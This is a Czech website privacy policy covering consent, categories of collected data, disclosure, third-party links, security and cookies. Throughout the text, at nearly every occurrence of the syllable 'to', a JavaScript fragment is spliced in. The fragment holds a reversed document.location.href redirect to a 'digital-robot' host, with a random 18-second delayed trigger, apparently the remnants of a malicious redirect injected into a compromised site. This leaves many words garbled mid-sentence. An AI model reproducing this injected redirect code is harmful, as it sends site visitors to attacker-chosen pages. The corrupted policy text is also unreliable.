ZASADY OCHRANY OSOBNÍCH ÚDAJŮ

Abychom mohli pokračovat ve vhodném poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tování našich služeb, shromažďujeme, používáme a sdělujeme údaje, které zahrnují také vaše osobní údaje. Zároveň využíváme všech nezbytných prostředků k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, abychom ochránili vaše soukromí. Přečtěte si, prosím, Zásady ochrany osobních údajů před návštěvou a/nebo použitím našich webových stránek, abyste získali vědomí o tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, jak jsou tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to údaje používány a chráněny. Zásady ochrany osobních údajů se vztahují pouze na naši webovou stránku. Nevztahují se na webové stránky, které na tutobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to naši stránku odkazují.

Vstupem nebo používáním jakékoli části webu a/nebo služeb souhlasíte s tím, že budete vázáni Zásadami ochrany osobních údajů, jak je uvedeno níže v tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to textu. Pokud váháte a/nebo nesouhlasíte se všemi a/nebo částí podmínek těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Zásad, poraďte se, prosím, právníkem, než začnete naše stránky používat, a pokud ani poté nesouhlasíte se všemi a/nebo některou částí podmínek, nesmíte vstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toupit na naše webové stránky nebo využít jakýchkoli naše služeb. Jakékoli nové funkce nebo nástroje, které přidáme na aktuální webovou stránku, jsou rovněž předmětem Zásady a Podmínek služby.

  1. Aktualizace, dodatky, změny

1.1. Vyhrazujeme si právo aktualizovat, měnit nebo nahrazovat jakoukoli část těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Zásad ochrany osobních údajů, a tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to vyvěšením aktualizací a/nebo dodatků a/nebo změn na naše webové stránky. Je vaší povinností pravidelně kontrolovat změny na tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to stránce. Pokud budete po zveřejnění jakýchkoli změn pokračovat v užívání a/nebo budete vstupovat na naše webové stránky, bude tatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to aktivita autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaticky považována za přijetí těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to změn. Pakliže nebudete souhlasit s jakýmkoli dodatkem a/nebo změnou a/nebo aktualizací, musíte okamžitě ukončit používání našich webových stránek.

1.2. Aktuální verzi Podmínek služby si můžete kdykoliv prohlédnout na tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to stránce. Nadpisy použité v tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dokumentu jsou jeho součástí pouze pro přehlednost a nebudou omezovat nebo jakkoliv ovlivňovat tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Podmínky.

  1. Souhlas

2.1. Používáním tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to stránky prohlašujete, že jste ve své zemi dosáhl/a plnoletobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosti a že jste nám udělil/a souhlas k shromažďování údajů, jak je specifikováno níže v tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to textu.

2.2. Pokud nám poskytnete osobní údaje pro konkrétní účel, znamená tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, že povolujete jejich shromažďování a použití pro přesné a efektivní poskytnutí našich služeb.

2.3. Pokud vyžadujeme vaše osobní údaje pro vedlejší účely, jako je marketing, recenze nebo komentář, budeme od vás požadovat písemné schválení s výslovným souhlasem. Pokud nám poskytnete takový souhlas a poté se změníte názor, můžete svůj souhlas kdykoliv odvolat.

  1. Shromažďování a použití informací

3.1. Shromažďujeme a používáme pouze informace v míře nezbytné k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, abychom mohli poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovat naše služby. S jakýmikoli osobními údaji, které shromažďujeme, zpracováváme a používáme, zacházíme s naprostobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou důvěrností a v souladu se zákonnými ustanoveními.

3.2. Mezi informace, které shromažďujeme a používáme, patří:

(a) Jméno, e-mailová adresa, telefonní číslo, datum narození a údaje o bance nebo platební kartě a jakýkoli důkaz o vaší identitě a/nebo adrese, které můžeme požadovat, a/nebo

(b) Písemný styk mezi námi, a/nebo

(c) Podrobnosti o jakémkoli bankovním účtu, který nám poskytnete, a/nebo

(d) Informace shromážděné prostřednictvím cookies;

(e) Telefonní hovory učiněné od nás nebo od vás, a/nebo

(f) Průzkumy, a/nebo

(g) Vaše IP adresa, časy přihlášení, operační systém a typ prohlížeče, a/nebo

(h) Detaily o vašich návštěvách na našich webových stránkách a/nebo

(i) Další informace, které nám můžete poskytnout.

  1. Účely shromažďování

4.1. Naše webové stránky můžete navštívit anonymně. V takovém případě můžeme mít přístup pouze k názvu vašeho poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovatele internetobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tových služeb, webové stránce, ze které jste byli přesměrováni na naše stránky a na které stránky se na našem webu díváte. Tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to informace shromažďujeme a analyzujeme pro statistické účely a interní výzkum.

4.2. Po vaší registraci budeme mít přístup k informacím, které nám poskytnete a my budeme moci tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to informace použít k poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tování našich služeb.

4.3. Co se týče informací, které jsme od vás získali nebo jinak obdrželi, můžeme je použít pro vnitřní účely, pokud jde o vývoj potenciálního projektu a/nebo vylepšení stávajících projektů a/nebo služeb.

4.4. Co se týče informací, které jsme od vás obdrželi nebo jinak získali, můžeme je použít k tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomu, abychom vás kontaktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovali nebo informovali o našich službách, projektech, budoucím vývoji atd. Pokud si nepřejete, abychom vás kontaktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovali, informujte nás prosím o tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to skutečnosti písemně.

4.5. Účely a postupy znamenající náležitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou péči.

4.6. V případě, že porušíte jakoukoli podmínku podle těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Zásad ochrany osobních údajů a/nebo Podmínek použití, budeme moci použít vaše osobní údaje, abychom se s vámi spojili a/nebo vás vypátrali a poté proti vám postupovali se všemi nezbytnými právními prostředky.

  1. Zveřejnění, sdělení

5.1. Můžeme zveřejnit nebo sdělit vaše osobní údaje pouze pokud:

(a) jsme povinni učinit tak ze zákona;

(b) jste nám dali své svolení;

(c) tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to je nezbytné s ohledem na poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tování našich služeb přímo vám;

(d) tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to vyžaduje třetí strana, jako je bankovní instituce, asociace karet nebo další poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovatelé služeb, aby tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dokončily poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tování služeb směrem k vám. Rozumí se, že od okamžiku, kdy poskytneme údaje výše uvedeným osobám a subjektům, neneseme žádnou odpovědnost týkající se použití údajů z jejich strany.

  1. Odkazy třetích stran

6.1. Někteří poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovatelé služeb vystupující jako třetí strany, kam patří platební brány a další zpracovatelé platebních transakcí, mají vlastní zásady ochrany osobních údajů, a tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to s ohledem na informace, které jim musíme poskytnout pro vaše transakce. U těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to poskytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovatelů vám doporučujeme přečíst si jejich zásady ochrany osobních údajů, abyste porozuměli způsobu, jakým budou nakládat s vašimi osobními údaji.

6.2. Když kliknete na odkazy na našich webových stránkách, mohou vás přesměrovat pryč z našich stránek. Nejsme zodpovědní za postupy týkající se ochrany osobních údajů jiných stránek a jsme přesvědčeni o tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, že byste si měli přečíst jejich prohlášení o ochraně osobních údajů.

6.3. Jakmile opustíte naše webové stránky nebo budete přesměrování na webové stránky nebo aplikaci třetí strany, již se na vás nevztahují tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to Zásady ochrany osobních údajů, ani smluvní podmínky našeho webu.

  1. Zabezpečení

7.1. Používáme pokročilé technologie a v našich webových stránkách jsou zabudovány bezpečnostní opatření k ochraně před ztrátobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou, zneužitím a změnou jakýchkoli dat a informací, které jsme obdrželi. Neustále se snažíme chránit důvěrnost těchtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to údajů a informací, a tak vylepšujeme naše bezpečnostní opatření. Nemůžeme však zaručit a vy byste ani neměli očekávat, že jakákoli data a informace, které jsme od vás obdrželi nebo jinak získali v souvislosti s našimi službami, zůstanou vždy v soukromí a zabezpečené. Nejsme odpovědni za jakékoli škody způsobené událostmi, které nemůžeme ovlivnit.

  1. Použití cookies

8.1. Cookies mohou být použity za účelem vylepšení našich služeb. Cookies neslouží k shromáždění osobních údajů a nepoužívají se k určení vaší identity. Pokud s použitím nejste spokojeni, můžete nakonfigurovat váš prohlížeč tak, aby byl informován o přijetí cookies a následně vám nabídl možnost jejich odmítnutí. Cookies mohou být použity k zaznamenání detailů o stránkách týkajících se konkrétních produktů a služeb, které jste navštívili na webu. To nám má poskytnout obecnou statistiku užívání, která nám umožní zlepšit webové stránky a poskytnout vám informace, které by vás mohly zajímat.

  1. Kontakt

9.1. Je pro nás stěžejní uchovat si platné kontaktní údaje, abychom se s vámi mohli spojit, kdykoliv je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nezbytné. Musíte vždy aktualizovat své kontaktní údaje, pokud dojde k jejich změně, a tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to prostřednictvím e-mailu nebo jakýmkoli jiným způsobem. Neneseme odpovědnost za případné ztráty způsobené neschopností a/nebo opomenutím aktualizace vašich osobních a kontaktních údajů.

9.2. Pokud máte jakékoli otázky týkající se našich Zásad ochrany osobních údajů nebo byste chtěli získat přístup, opravit, doplnit nebo smazat jakékoli osobní údaje, které o vás máme, kontaktujte nás.